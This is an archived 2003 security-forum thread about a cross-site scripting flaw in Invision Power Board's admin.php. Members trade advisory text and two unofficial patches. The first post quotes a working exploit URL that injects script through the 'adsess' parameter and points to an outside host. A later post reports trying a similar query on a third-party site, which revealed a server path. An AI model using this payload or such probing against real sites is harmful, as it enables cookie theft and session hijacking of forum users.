Invision Power Board And Scripting Attacks

Full Version: Invision Power Board And Scripting Attacks

GovernmentSecurity.org > The Archives > Exploit Articles

whisker

Aug 11 2003, 06:43 AM

Hi,

I just read this just in case you are interested:

QUOTE

A demonstration exploit URL is provided:

http://forums.invisionpower.com/admin.php?adse ss='><script>window.open
(window.location.search.substring
(78));</script><http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision

Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:  No solution was available at the time of this entry.

Vendor URL:  www.invisionboard.com/ (Links to External Site)

The link http://www.SecurityTracker.com/alerts/2003...ug/1007449.html

woutiir

Aug 11 2003, 11:27 AM

Hey Whisker,

Nice post mate, I and many others (WHO DON't REPLY

) are really thankful for this posts. So please keep 'm coming!

Greetings,
woutiir

Fletcher

Aug 11 2003, 11:33 AM

yes very interesting

GSecur

Aug 11 2003, 02:21 PM

Yeah great post whisker, packet just posted some information on this but it was a bit more vague.

As for this exploit everyone should always be weary of of what links they click on. And also don't save your password in the cookies!

packet

Aug 11 2003, 02:37 PM

Yeah, sorry... my post was from the original bugtraq post by the researcher and I forgot that I needed to put CODE around it instead of QUOTE as it interpreted the code.

DOH!

--P.G.

packet

Aug 11 2003, 04:44 PM

An *unnoficial* fix for the recent IB exploit from silent needle:

CODE

In-Reply-To: <20030809082131.25004.qmail@www.securityfocus.com>

to patch the forum

all what you have to do

is adding these lines in the begining of admin.php

======admin.php======

<?php

if (strstr($adsess,"'") != NULL){

echo "Silent Needle: i don't like you.<br>dont try to hack. :) [be a

white hat don't be a black hat]<br><a href='index.php'>index.php</a>";

exit;

}

if (strstr($adsess,"\"") != NULL){

echo "Silent Needle: i don't like you.<br>dont try to hack. :) [be a

white hat don't be a black hat]<br><a href='index.php'>index.php</a>";

exit;

}

//.........

//rest of code

=====================

this work with me and i hope it work with you too.

Oh Long Night

greetz to: SP.IC, NetSpider, ARAB-HAK, zalaboza, C0NIk, and all

arabsecure.net t34m..

Silent Needle

member of ArabSecure.net t34m

silentneedle@hotmail.com

GSecur

Aug 11 2003, 05:05 PM

LOL nice code post packet, I'll have to check it out. I like the messages it sends

packet

Aug 11 2003, 06:14 PM

For a more concise fix (but not as fun) the original hacker (boy bear) posted this to bugtraq today:

CODE

In-Reply-To: <20030809082131.25004.qmail@www.securityfocus.com>

To repair Bug to edit the file admin.php and to add after the line:

$IN['AD_SESS'] = $HTTP_POST_VARS['adsess'] ? $HTTP_POST_VARS['adsess'] :

$HTTP_GET_VARS['adsess'];

To add this :

if (isset($IN['AD_SESS'])) {

$IN['AD_SESS'] = htmlspecialchars($IN['AD_SESS']);

}

And is it just me or does Boy Bear sound a little... well... you know?

I mean I totally respect that and all, I mean they call me a bear cause I'm hairy too. I try to tell them that us gophers are just naturally hairy but they don't seem to care. Hmmm... boy gopher doesn't have the same ring to it though does it?

--P.G. (AKA the other boy wonder)

Black_hat

Aug 11 2003, 08:34 PM

QUOTE

be a white hat don't be a black hat

It's good messege

after send this query to this address : http://dns2go.deerfield.com/status/index.h...36;BinaryVision

the result give me physical location (On host machine)

C:\INETPUB\WWWROOT\V5\DEERFIELD.COM\PRODUCTS\DNS2GO\STATUS\USERSTATUS.CFM.

Cool

Black_Hat

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.